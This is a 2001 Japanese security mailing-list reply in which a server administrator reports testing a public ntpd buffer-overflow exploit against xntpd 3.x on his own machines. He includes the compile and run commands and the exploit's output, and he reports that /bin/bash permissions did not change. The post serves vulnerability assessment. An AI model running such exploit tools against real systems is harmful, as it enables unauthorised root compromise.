[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[stalk:00255] Re: ntpd =< 4.0.99k remote buffer overflow
- To: security-talk@xxxxxxxxxxxxxxxxxxxx
- Subject: [stalk:00255] Re: ntpd =< 4.0.99k remote buffer overflow
- From: KuniG <kunig@xxxxxxxxxxx>
- Date: Thu, 5 Apr 2001 14:23:40 +0900
みなさま初めまして。KuniGと申します。m(_ _)m
On Thu, 05 Apr 2001 13:00:24 +0900
KOJIMA Hajime / 小島肇 <kjm@xxxxxxxxxxxxxxxxxx> wrote:
kjm> xntpd 3.x 系列の調査 (だれかやって……)
試しに、私の管理しているサーバーで試してみました。環境は、
1.OS:TLW3.0(kernel 2.2.13), xntpd:xntp3-5.93-3.i386.rpm
2.OS:TLS6.0(kernel 2.2.18), xntpd:xntp3-5.93-9.i386.rpm
です。xntpdのrpmはTL社が提供しているものです。
両方の環境で、同じ結果が得られました。
---
$ cc -o /tmp/sh dupa.c
$ cc -o ntpdx ntpdx.c
$ ./ntpdx -t2 localhost
ntpdx v1.0 by venglin@xxxxxxxxxxxxxxxxx
Selected platform: RedHat Linux 7.0 with ntpd 4.0.99k-RPM (/tmp/sh)
RET: 0xbffff777 / Align: 240 / Sh-align: 160 / sending query
[1] <- evil query (pkt = 512 | shell = 45)
[2] <- null query (pkt = 12)
Done.
/tmp/sh was spawned.
$ ls -la /bin/bash
-rwxr-xr-x 1 root root 450144 Nov 25 1999 /bin/bash*
---
となり、
kjm> <http://www.securityfocus.com/archive/1/174011>
に書かれているような、/bin/bashのアクセス権の変化は見られませんでした。
恥ずかしながら、私にはこの結果をこの先どう扱ってよいのか判断する技量が
ありませんので、結果のご報告だけさせていただきます。
#本当は自分なりの考察が付けられればよいのですが、申し訳ございません。(泣)
#情報が足りないようでしたら、お申し付け下さい。
-----------------------------------
KuniG (くにじー)
e-mail : kunig@xxxxxxxxxxx
-----------------------------------
--
- このメイリングリストに関する質問・問い合せ等は
- <security-talk@xxxxxxxxxx>までお知らせください
--
------------------------------------------------------------------------
◆桜も良いけど爽やか季節♪ 〜お出かけどこ行く?!
http://www.infoseek.co.jp/Playspot?pg=playspot_top.html&svx=971122